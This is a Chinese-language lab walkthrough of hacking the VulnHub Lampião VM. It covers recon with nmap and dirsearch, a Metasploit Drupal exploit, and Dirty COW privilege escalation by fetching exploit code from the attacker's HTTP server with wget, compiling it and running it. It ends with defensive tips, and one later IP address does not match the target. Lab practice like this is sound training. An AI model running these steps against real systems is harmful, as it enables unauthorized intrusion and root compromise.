Lampião打靶记录
字数 901 2025-08-12 11:34:44
Lampião靶机渗透测试详细教学文档
一、靶机概述
Lampião是一个基于Drupal CMS的漏洞靶机,包含多个常见漏洞点,适合练习Web应用渗透测试和提权技术。
二、环境准备
1. 靶机下载与安装
- 下载地址: https://www.vulnhub.com/entry/lampiao-1,249/#download
- 导入虚拟机软件(VMware/VirtualBox)
- 网络设置: 桥接至物理网卡
2. 攻击机准备
- Kali Linux或其他渗透测试发行版
- 确保与靶机在同一网络段
三、信息收集阶段
1. 发现靶机IP
arp-scan -l
或
netdiscover -r 192.168.0.0/24
2. 端口扫描
nmap -Pn -p 0-65535 -O 192.168.0.101
关键点: 发现1898端口运行Web服务
3. Web目录扫描
python3 dirsearch.py -u http://192.168.0.101:1898/ -x 403
python3 dirsearch.py -u http://192.168.0.101
4. 识别CMS版本
访问: http://192.168.0.101:1898/CHANGELOG.txt
关键发现: 暴露Drupal框架版本信息
四、漏洞利用阶段
1. 使用Metasploit框架
msfconsole
search drupal
2. 选择合适exploit
根据收集到的Drupal版本选择对应漏洞模块
3. 配置参数
show options
set rhost 192.168.0.101
set rport 1898
exploit
结果: 成功获取初始shell
五、提权阶段
1. 系统信息收集
uname -a
关键点: 识别Linux内核版本
2. 上传漏洞检测脚本
chmod +777 1.sh
./1.sh
发现: 系统存在脏牛(Dirty COW)漏洞(CVE-2016-5195)
3. 脏牛漏洞利用步骤
a. 获取利用代码
searchsploit dirty
locate linux/local/40847.cpp
b. 传输文件到靶机
scp /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp
python3 -m http.server 800
在靶机上:
wget http://192.168.0.110:800/40847.cpp
c. 编译执行
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
chmod +777 40847
./40847
结果: 显示root密码
4. 获取root权限
ssh root@192.168.0.104
六、关键知识点总结
- Drupal漏洞利用: 通过版本信息泄露找到对应漏洞
- 脏牛提权: Linux内核提权经典漏洞(CVE-2016-5195)
- 文件传输技巧: 通过Python HTTP服务传输文件
- 编译执行: 在目标系统上编译C++漏洞利用代码
七、防御建议
- 及时更新CMS系统
- 限制敏感文件访问(CHANGELOG.txt等)
- 保持操作系统内核更新
- 限制不必要的服务暴露
八、扩展学习
- 尝试其他Drupal漏洞利用方法
- 探索不使用Metasploit的手动利用方式
- 研究其他Linux提权技术(如SUID、sudo滥用等)